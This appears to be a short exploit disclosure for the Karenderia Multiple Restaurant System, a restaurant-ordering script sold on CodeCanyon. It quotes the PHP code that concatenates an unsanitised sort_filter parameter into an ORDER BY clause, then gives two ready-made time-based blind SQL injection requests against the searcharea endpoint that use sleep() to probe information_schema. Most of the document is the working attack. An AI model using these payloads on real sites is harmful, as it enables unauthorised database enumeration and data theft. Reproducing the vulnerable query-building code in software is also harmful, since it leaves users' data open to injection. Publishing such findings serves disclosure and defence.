Vendor Homepage: buyer2@codemywebapps.com
https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
The true and only #1 multiple restaurant in codecanyon Karenderia Multiple Restaurant System is a restaurant food ordering and restaurant membership system.
FunctionsV3::searchByMerchant
$sort_by =" ORDER BY is_sponsored DESC, restaurant_name ASC";
$sort_combine=$sort_by;
if (isset($getdata['sort_filter'])){
if (!empty($getdata['sort_filter'])){
$sort="ASC";
if($getdata['sort_filter']=="ratings"){
$sort="DESC";
}
$sort_combine=" ORDER BY ".$getdata['sort_filter']." $sort";
}
}
Blind SQL Injection in all end points that allow sorting through sort_filter parameter.
searcharea?s=x&sort_filter=(CASE WHEN(SELECT count(*) FROM information_schema.tables WHERE table_name = 'COLUMNS')=1 THEN sleep(10) ELSE sleep(1) END)--&display_type=listview
searcharea?s=x&sort_filter=(CASE WHEN(SELECT count(*) FROM information_schema.tables WHERE table_name LIKE 'BRUTE_FORCE%')=1 THEN sleep(10) ELSE sleep(1) END)--&display_type=listview